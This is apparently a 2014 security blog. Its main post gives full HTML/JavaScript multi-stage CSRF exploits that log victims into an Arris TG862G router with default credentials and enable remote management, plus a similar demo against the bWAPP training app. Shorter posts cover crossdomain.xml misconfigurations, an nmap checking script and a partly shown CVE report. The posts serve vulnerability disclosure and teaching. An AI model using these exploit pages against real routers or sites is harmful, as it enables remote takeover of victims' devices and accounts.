<b>TL;DR: </b>Using login CSRF + multi-stage CSRF, you can create a one click exploit that would silently log a user into their vulnerable, Comcast provided modem/router with default credentials (if they have not been changed) and then enable remote management (or anything else). I'll show how I did this with my previously vulnerable modem/router, and then give a more generic POC that you can try out on bWAPP, an intentionally vulnerable web application. <br />
<h2>
Unnecessary Background</h2>
This story starts about a year ago when my colleagues convinced me to stop being lazy and switch to a DOCSIS 3.0 modem so that I could actually get the speeds I am paying for. I filled out the Comcast XFinity form and had them send me a new modem. New toy -- Yay!<br />
<br />
So basically right after I had the new device working, I decided it was time to mess around. Turns out the modem is an <a href="http://www.amazon.com/ARRIS-Residential-Gateway-GigaPort-TG862G-CT/dp/B00NR1EHP8/ref=sr_1_2?ie=UTF8&qid=1415214702&sr=8-2&keywords=arris+tg862g" target="_blank">Arris TG862G</a>, a modem that is designed to be re-branded by many ISPs and distributed to their customers. Unfortunately, as is common with SOHO devices, the modem was universally vulnerable to CSRF (and some XSS as well).<br />
<br />
<a href="http://seclists.org/fulldisclosure/2014/Dec/57">CVE-2014-5437: Cross-site request forgery</a><br />
<a href="http://seclists.org/fulldisclosure/2014/Dec/58">CVE-2014-5438: Cross-site Scripting</a><br />
<h2>
How bad can it be?</h2>
Before sending off the vulnerability report to Arris though, I figured I would try to dream up a worst case scenario, just like I do at my <a href="http://bluecanopy.com/">day job</a>.<br />
<br />
One of the toughest conditions to meet in the exploitation of most CSRF vulnerabilities is that the victim needs to be authenticated with the vulnerable application. If you are talking about an application with a huge inactivity timeout -- or one that you can be fairly confident the victim will be authenticated with (Google, Facebook, etc), this is not a problem. For an application that users are rarely logged into, the likelihood that your attack will be successful goes way down. <br />
<br />
Well, as I was thinking about exploitation scenarios, I remembered that this device ships with a standard IP address and uses a default username/password that does not need to be changed, even after the first login. I'd love to see the percentage of customers who have ever even logged into the management console once, let alone changed the default password. <br />
<br />
See where I am headed? Login-CSRF.<br />
<br />
Ultimately, what we need to do is create a CSRF exploit that causes our victim to issue multiple forged requests to the vulnerable application, in order.<br />
<br />
<b>1) </b>Attempt to log the victim in with the default credentials (Login-CSRF)<br />
<b>2) </b>Seamlessly execute the intended CSRF attack(s) without requiring more user interaction<br />
<br />
<h3>
Login-CSRF background</h3>
The malicious use case for "Login-CSRF" that is most commonly cited is <a href="http://www.adambarth.com/papers/2008/barth-jackson-mitchell-b.pdf">tricking your victim to log in with your credentials</a> in order to launch an exploit or socially engineer them further. <br />
<br />
What I needed is slightly different, not new, and described below:<br />
<br />
<div style="margin: 0in;">
<span style="font-family: inherit;"><a href="http://www.amazon.com/The-Web-Application-Hackers-Handbook/dp/1118026470" target="_blank">Web Application Hackers Handbook v2</a> on page 507 (2011):</span></div>
<div style="margin: 0in;">
<br /></div>
<span style="font-family: Courier New, Courier, monospace;">If the device's web interface uses forms-based authentication, it is often possible to perform a two-stage attack by first logging the user in to the device and then performing the authenticated action. Since most users do not modify the default credentials for devices of this kind (perhaps on the assumption that the web interface can be accessed only from the internal home network), the attackers web page can first issue a login request containing default credentials. The device then sets a session token in the user's browser, which is sent automatically in subsequent requests, including those generated by the attacker. </span> <br />
<div style="margin: 0in;">
<span style="font-family: inherit; font-size: x-small;"><br /></span></div>
<div style="margin: 0in;">
<span style="font-family: inherit;">This was also </span>discussed<span style="font-family: inherit;"> around the same time by </span>Jeremiah Blatz at <span style="font-family: inherit;">McAfee Foundstone in 2011, titled </span><a href="http://www.mcafee.com/us/resources/white-papers/wp-csrf-attack-defense.pdf" style="font-family: inherit;">CSRF:
Attack and Defense</a><span style="font-family: inherit;">. Here is an excerpt: </span><br />
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: Courier New, Courier, monospace;">Many web-enabled devices ship with default user accounts, with well-known usernames and passwords. An attacker can exploit this to use CSRF to attempt to log users into the target website before performing a real CSRF attack. This is of particular concern for routers, which tend to have predictable IP addresses. Changing the default password on these devices prevents attackers from performing a CSRF login operation.</span> <br />
<br />
So people have been talking about this for years, but the question is: <i>How do I actually pull this off? </i>There are not a lot of public examples out there, so I figured I would share the solution that I came up with, along with some other examples. <br />
<h3>
Multi-Stage CSRF background</h3>
<div>
This is very closely related to <a href="http://www.lanmaster53.com/2013/07/multi-post-csrf/" target="_blank">multi-POST CSRF</a>, however with multi-POST CSRF, it shoots all of the requests at the same time. Lanmaster53's technique in particular is great if you need to do multiple things at once, but unfortunately it is not what we need if the requests are time or sequence sensitive. </div>
<div>
<br /></div>
You want to pull multi-stage CSRF out of the arsenal when you need the victim to submit multiple requests -- in order -- on your behalf. There are multiple scenarios where this method will give you an overall better exploit, not just with Login-CSRF. The first time I had to do this on an assessment, I needed my victim to check out an item from revision control, modify it, then check it back in. If you shotgunned all three CSRF's at the same time, it would most likely not work, for obvious reasons. To accomplish that hack, I used a javascript timer to space out the requests, and my finished exploit was very similar to <a href="http://ceriksen.com/2012/09/29/two-stage-csrf-attacks/" target="_blank">this post by Charlie Eriksen</a>.<br />
<br />
Instead of using the timer based approach for this POC, I decided to use <b>XMLHttpRequest</b> combined with <b>onreadystatechange</b>. I'll show the Arris POC first, and then I'll include a POC for launching this attack against bWAPP, an intentionally vulnerable web application, so that you can try it for yourself. <br />
<br />
<h2>
Arris POC</h2>
So now we have all the pieces to do something evil. The following will work if the victim has an ArrisTG862G as long as the victim has not changed their default password for the Arris modem:<br />
<br />
1) Victim arrives at attacker's evil site via phishing, watering hole attack, etc<br />
2) Victim is CSRFed into authenticating with the Arris TG862G with default credentials<br />
3) Victim is then CSRFed into opening up remote management of the router<br />
4) Attacker logs into router with default credentials from the internet<br />
<br />
Here is the CSRF source served by the attacker (arris-MultiStage.html):<br />
<br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #062873; font-weight: bold;"><html></span>
<span style="color: #062873; font-weight: bold;"><head></span>
<span style="color: #062873; font-weight: bold;"><script></span>
<span style="color: #007020; font-weight: bold;">function</span> submitRequest1()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"POST"</span>, <span style="color: #4070a0;">"https://10.0.0.1/home_loggedout.php"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Content-Type"</span>, <span style="color: #4070a0;">"application/x-www-form-urlencoded"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">"username=admin&password=password"</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.onreadystatechange <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">function</span>()<span style="line-height: 125%;">{</span></pre>
<pre style="line-height: 125%; margin: 0;"> <span style="color: #007020; font-weight: bold;">if</span>(xhr.readyState <span style="color: #666666;">==</span> <span style="color: #40a070;">4</span>){
submitRequest2();
}
}
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #007020; font-weight: bold;">function</span> submitRequest2()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"POST"</span>, <span style="color: #4070a0;">"https://10.0.0.1/remote_management"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Content-Type"</span>, <span style="color: #4070a0;">"application/x-www-form-urlencoded"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">"http_port=8080&http=enabled&single=any"</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #062873; font-weight: bold;"></script></span>
<span style="color: #062873; font-weight: bold;"></head></span>
<span style="color: #062873; font-weight: bold;"><body</span> <span style="color: #4070a0;">onload="submitRequest1();"</span><span style="color: #062873; font-weight: bold;">></span></pre>
<pre style="line-height: 125%; margin: 0;"><span style="color: #062873; font-weight: bold;"><img</span> <span style="color: #4070a0;">src="distraction.jpg"</span> <span style="color: #4070a0;">alt="Nothing to see here"</span><span style="color: #062873; font-weight: bold;">></span>
<span style="color: #062873; font-weight: bold;"></body></span>
<span style="color: #062873; font-weight: bold;"></html></span>
</pre>
</div>
<br />
The way this works is that the <b>body onload</b> at the very bottom calls the first function submitRequest1(). That function launches the first CSRF request. Then the <b>onreadystatechange</b> inside submitRequest1() calls the second function, submitRequest2(), but only after the <a href="http://www.w3schools.com/ajax/ajax_xmlhttprequest_onreadystatechange.asp">first request has finished and the response is ready</a>. Once submitRequest2() is called, the second CSRF request is made. The important thing to note here, is that by the time the second request is made, it uses the post authentication session token, which is why it is successful. <br />
<br />
A quick side note before moving on: You could easily add the onreadystatechange lines to submitRequest2(), and point that to submitRequest3(), and so on. <br />
<br />
In terms of the severity of this exploit, remember that the attacker could just look through their web logs to determine the public IP of people who fell victim to the attack. At that point, it is just a matter of connecting to the public IP on port 8080/tcp, and seeing if they can log in with the default credentials. <br />
<br />
Lastly, before moving away from Arris/Comcast, I wanted to remind everyone that both the CSRF and XSS I reported on back in July have been fixed, and the fix has been pushed out by C<span style="font-family: inherit;">omcast. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">If you have an Arris </span><span style="font-family: inherit;">modem/router but do not use Comcast, contact your ISP (or Arris) to verify that your firmware </span><span style="font-family: inherit;">has been updated to address this vulnerability. Or you could fire up </span><span style="font-family: inherit;">Burp and see for yourself. ;) </span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<h2>
bWAPP POC</h2>
<a href="http://www.itsecgames.com/">bWAPP</a> is an intentionally vulnerable web application, and it is a perfect place to try out multi-stage CSRF on something you can easily download and that you know is vulnerable.<br />
<br />
1) Login in to bWAPP and pick the CSRF Transfer Amount module:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-_FIoltX6SSY/VJiRC_sy7PI/AAAAAAAAAUw/TtGhVOgj_Tg/s1600/1pick-csrf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-_FIoltX6SSY/VJiRC_sy7PI/AAAAAAAAAUw/TtGhVOgj_Tg/s1600/1pick-csrf.png" height="192" width="320" /></a></div>
2) Verify the current value (1000 EUR):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1ZShOK3Ybzo/VJiRU1Cd43I/AAAAAAAAAU4/UrBdLY55Grs/s1600/csrf-pre.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-1ZShOK3Ybzo/VJiRU1Cd43I/AAAAAAAAAU4/UrBdLY55Grs/s1600/csrf-pre.png" height="312" width="320" /></a></div>
3) Log out! <--- This is normally what would prevent CSRF from working! If the user is logged out, your CSRF attack is not going to work!<br />
<br />
4) Have your victim navigate to your attacker's server and load the CSRF payload:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-dfOOlFeYm4c/VJiUccYxaLI/AAAAAAAAAVE/t-KI0FVvo3k/s1600/csrf-attackerbox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-dfOOlFeYm4c/VJiUccYxaLI/AAAAAAAAAVE/t-KI0FVvo3k/s1600/csrf-attackerbox.png" height="83" width="320" /></a></div>
5) Navigate back to https://172.16.214.132/bWAPP/csrf_2.php. You should be logged in (magic), and you should see that 10 EUR has been removed from the account:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-8xvLOvpOCME/VJiUykLvybI/AAAAAAAAAVM/cIse2hPPgKA/s1600/4-csrf-finished.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-8xvLOvpOCME/VJiUykLvybI/AAAAAAAAAVM/cIse2hPPgKA/s1600/4-csrf-finished.png" height="314" width="320" /></a></div>
<br />
Here is the code:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .1em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;"><span style="color: #062873; font-weight: bold;"><html></span>
<span style="color: #062873; font-weight: bold;"><head></span>
<span style="color: #062873; font-weight: bold;"><script></span>
<span style="color: #007020; font-weight: bold;">function</span> submitRequest1()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"POST"</span>, <span style="color: #4070a0;">"https://172.16.214.132/bWAPP/login.php"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Content-Type"</span>, <span style="color: #4070a0;">"application/x-www-form-urlencoded"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">"login=bee&password=bug&security_level=0&form=submit"</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.onreadystatechange <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">function</span>(){
<span style="color: #007020; font-weight: bold;">if</span>(xhr.readyState <span style="color: #666666;">==</span> <span style="color: #40a070;">4</span>){
submitRequest2();
}
}
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #007020; font-weight: bold;">function</span> submitRequest2()
{
<span style="color: #007020; font-weight: bold;">var</span> xhr <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> XMLHttpRequest();
xhr.open(<span style="color: #4070a0;">"GET"</span>, <span style="color: #4070a0;">"https://172.16.214.132/bWAPP/csrf_2.php?account=123-45678-90&amount=10&action=transfer"</span>, <span style="color: #007020; font-weight: bold;">true</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept"</span>, <span style="color: #4070a0;">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>);
xhr.setRequestHeader(<span style="color: #4070a0;">"Accept-Language"</span>, <span style="color: #4070a0;">"en-US,en;q=0.5"</span>);
xhr.withCredentials <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">true</span>;
<span style="color: #007020; font-weight: bold;">var</span> body <span style="color: #666666;">=</span> <span style="color: #4070a0;">""</span>;
<span style="color: #007020; font-weight: bold;">var</span> aBody <span style="color: #666666;">=</span> <span style="color: #007020; font-weight: bold;">new</span> Uint8Array(body.length);
<span style="color: #007020; font-weight: bold;">for</span> (<span style="color: #007020; font-weight: bold;">var</span> i <span style="color: #666666;">=</span> <span style="color: #40a070;">0</span>; i <span style="color: #666666;"><</span> aBody.length; i<span style="color: #666666;">++</span>)
aBody[i] <span style="color: #666666;">=</span> body.charCodeAt(i);
xhr.send(<span style="color: #007020; font-weight: bold;">new</span> Blob([aBody]));
}
<span style="color: #062873; font-weight: bold;"></script></span>
<span style="color: #062873; font-weight: bold;"></head></span>
<span style="color: #062873; font-weight: bold;"><body</span> <span style="color: #4070a0;">onload="submitRequest1();"</span><span style="color: #062873; font-weight: bold;">></span>
<span style="color: #062873; font-weight: bold;"></body></span>
<span style="color: #062873; font-weight: bold;"></html></span>
</pre>
</div>
<br />
That's it. I hope this POC will come in handy next time you need to demonstrate how bad CSRF could be. I know most developers/companies will fix CSRF as soon as you tell them it is vulnerable, but sometimes, a one click exploit is worth a thousand words!Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-21780012555028067152014-11-18T16:48:00.000-05:002014-12-14T01:01:51.268-05:00Crossdomain.xml can be overly permissive even without a wildcard (*)Before too much time passes, I want to write about a point I covered in my presentation that is not widely covered on the web -- or maybe not even covered at all. The main point is that even if you have a very specific list of domains that you trust, you may still be vulnerable to <a href="https://cwe.mitre.org/data/definitions/942.html" target="_blank">CWE-942</a>, if one of the domains that you trust is available for purchase.<br />
<br />
To illustrate this point in my talk, I used the crossdomain.xml file at www.sears.com:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-JjNEyhR2bYQ/VGu7Awewp4I/AAAAAAAAATY/K3Z6RnAJigY/s1600/pasted-image-4730.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-JjNEyhR2bYQ/VGu7Awewp4I/AAAAAAAAATY/K3Z6RnAJigY/s1600/pasted-image-4730.png" height="598" width="640" /></a></div>
<span id="goog_149566982"></span><span id="goog_149566983"></span><br />
<br />
What I found in my research is that there are plenty of crossdomain.xml files that trust sites that are available for purchase. <b>As far as I know, every single security assessment tool out there would pass right over these sites, missing the fact that a vulnerable configuration could be in place. </b><br />
<br />
In the case of www.sears.com, they are trusting the domain: searstestsite.com. For the purpose of demonstrating the vulnerability, I purchased this domain. This means that I can now host a malicious SWF at www.searstestsite.com, a domain that I own and operate, and anyone who is authenticated with www.sears.com, who also navigates to my site, will execute my malicious SWF.<br />
<br />
When I realized this is actually somewhat common, I wrote a nmap script to parse crossdomain.xml files and help you (the tester) determine if any of the trusted domains are available for purchase:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-ZHNuFnhGfb8/VGu7icwZXfI/AAAAAAAAATw/egwLQUXTByM/s1600/pasted-image-7192.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ZHNuFnhGfb8/VGu7icwZXfI/AAAAAAAAATw/egwLQUXTByM/s1600/pasted-image-7192.png" height="378" width="640" /></a></div>
<br />
<br />
You can then paste the results into https://www.dynadot.com/domain/bulk-search.html, like so:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-eTfUrKwRi8c/VGu7SFe35LI/AAAAAAAAATk/XQaTxyFk13c/s1600/pasted-image-3390.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-eTfUrKwRi8c/VGu7SFe35LI/AAAAAAAAATk/XQaTxyFk13c/s1600/pasted-image-3390.png" height="450" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
and if you are lucky, you will get a valid hit like I did:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-3JcIS0drIoE/VGu7RoPUqII/AAAAAAAAATg/dqPbxJtB7pg/s1600/pasted-image-3396.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-3JcIS0drIoE/VGu7RoPUqII/AAAAAAAAATg/dqPbxJtB7pg/s1600/pasted-image-3396.png" height="440" width="640" /></a></div>
<br />
<br />
At the time of my talks, I still had not yet found a domain service that allows you to make automated requests without an API key. Since then, while it is still not a 100% perfect solution, I have found a site that will give us what we need for the 10-15 most common TLDs: <a href="http://instantdomainsearch.com/">instantdomainsearch.com</a>.<br />
<br />
So now, if you run my nmap script with <i>--script-args=liveLookup</i>, the script will attempt look up the domain availability for every domain that has a TLD that can be checked. For ones that are not available, there is no need to tell the user about them. For the ones that are available, the script makes it very clear that the domain is available for purchase. Lastly, the script falls back to the original method for any domain that has a TLD unsupported by instantdomainsearch.com.<br />
<br />
Here is http-crossdomain.nse in action, using the <i>liveLookup</i> script argument<br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f0f0f0; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .6em; width: auto;">
<pre style="line-height: 125%; margin: 0;">nmap -n -p 80 www.domain.com --script<span style="color: #666666;">=</span>http-crossdomain --script-args<span style="color: #666666;">=</span>liveLookup
Host is up <span style="color: #666666;">(</span>0.012s latency<span style="color: #666666;">)</span>.
PORT STATE SERVICE
80/tcp open http
| http-crossdomain:
| TRUSTED DOMAIN AVAILABLE FOR PURCHASE: domain1.com
| TRUSTED DOMAIN AVAILABLE FOR PURCHASE: domain2.com
|
| POTENTIALLY VULNERABLE <span style="color: #666666;">(</span>Requires a manual check<span style="color: #666666;">)</span>:
| Crossdomain.xml whitelists domains that could potentially be available <span style="color: #007020; font-weight: bold;">for </span>purchase.
| This script attempted to check all whitelisted domains to see <span style="color: #007020; font-weight: bold;">if </span>any of the domains
| were available. Unfortunately, the script was unable to check some domains.
| If the FQDN requires authentication and serves sensitive information, you will want
| to manually check the remaining domains by browsing to the URL below and pasting
| the comma delimited list into the Dynadot bulk domain search tool.
|
| DOMAIN LOOKUP URL: https://www.dynadot.com/domain/bulk-search.html
|
| TRUSTED DOMAINS: domain.au,domain.at,domain.be,domain.com.cn,domain.fr,domain.de,domain.com.hk,domain.in
|
| REFERENCES:
| https://cwe.mitre.org/data/definitions/942.html
| http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html
|_
</pre>
</div>
<br />
<a href="https://www.blogger.com/blogger.g?blogID=5890567984672491244" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-7807572342830620552014-10-28T23:14:00.003-04:002014-12-23T16:18:54.540-05:00BSidesDC 2014Presenting at BSidesDC was an amazing experience. I feel so lucky that we have our very own local con, and I am extremely grateful to the organizing committee and other volunteers who make this event happen. <br />
<br />
This is very similar to my DerbyCon talk, however it is 20 minutes longer which gave me time to walk through how to go from finding this vulnerability to exploiting it, including showing the audience how to create a POC SWF. Also, I released SWF-Server, which will give you everything you need to create your own SWF to exploit this vulnerability.<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/v5DIcAtnKRU" width="560"></iframe>
</center>
<br />
<div style="text-align: left;">
Download the project here: <a href="https://github.com/sethsec/crossdomain-exploitation-framework">https://github.com/sethsec/crossdomain-exploitation-framework</a></div>
<br />
<br />
<br />
<br />Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-21802954854507842372014-10-10T15:41:00.001-04:002014-10-11T20:06:32.119-04:00DerbyCon 4.0 - SWF Seeking Lazy Admin for Cross Domain Action<b>Abstract: </b>Security misconfiguration is #5 on the OWASP 2013 Top 10. This talk shows how the misconfiguration of one file can compromise the security of an entire web application.<br />
<br />
In the talk, youll be introduced to the crossdomain.xml file. This file determines how third party Flash Objects (SWFs) hosted on other domains can interact with your domain. Unfortunately, this file requires manual configuration on the part of the administrator, and as we all know, when manual configuration is required, mistakes happen.Sometimes, administrators give up and whitelist the entire internet in order to "make it work". This is essentially like adding an "accept all" rule on your firewall or setting your password to <blank>. </blank><br />
<div>
<br /></div>
<div>
We will review how to identify the vulnerability, how to abuse it, and how to write your own SWFs that exploit the flaw. Examples of public sites that until recently contained this vulnerability will be provided, including a few from the Alexa Top 100.<br />
<div>
<span style="font-family: Arial; font-size: 12px; line-height: 15px; text-align: -webkit-center;"><br /></span></div>
<div>
<br /></div>
<center>
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/v_5dTJYjSMA" width="560"></iframe>
</center>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-24671507058872625032014-07-23T23:39:00.001-04:002014-07-23T23:39:59.599-04:00CVE-2014-2227This CVE covers a vulnerability found in the Ubiquiti Networks AirVision application. For more background on this particular vulnerability, check out this post:<br />
<br />
<a href="http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html" target="_blank">Exploiting misconfigured crossdomain.xml files</a><br />
<div>
<br /></div>
<div>
In fact, I wrote that first crossdomain.xml blog post after finding this AirVision vulnerability back in February. If you already read that post, you should recognize the vulnerable form I use for the POC here (adding an administrator), is the same one I used earlier.</div>
<div>
<br /></div>
<div>
Here is a cleaned up version of what I sent to Ubiquiti back in February:<br />
<br />
<h1 dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 12pt;">
<span style="color: #2e74b5; font-family: Calibri; font-size: 21px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller v2.1.3 - Overly Permissive default crossdomain.xml</span></h1>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">CWE-264: </span><a href="http://cwe.mitre.org/data/definitions/264.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/264.html</span></a><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
<br />
<div>
<b><u>Misuse Case</u></b></div>
<div>
<br /></div>
<div>
<span style="color: blue;">If the victim user is authenticated with their AirVision Controller, and they visit a malicious site, the owner of the malicious site can make changes to, and read data from, the AirVision Controller. The malicious site can even add a new administrative user account. </span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Vulnerable default configuration:</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="254px;" src="https://lh3.googleusercontent.com/L9EZPENjUAo8DKZCtd4x3_IwEO6xcBb2k-NaebevoLACzHy8s88Pu3IWrSkHFVhfiemS4Wzuv7eKc5cdCO26Vij3Z0zb6JBIsFFMWcXCjpf1YZFkq-1Vl-k7K_mxYH3j02o2km1tgqc" style="-webkit-transform: rotate(0rad); border: none;" width="602px;" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; font-weight: bold; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">POC:</span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><b>Step 1:</b></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> Attacker hosts the malicious SWF on his/her server, and socially engineers a victim AirVision administrator who is currently logged in, to view the SWF file</span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
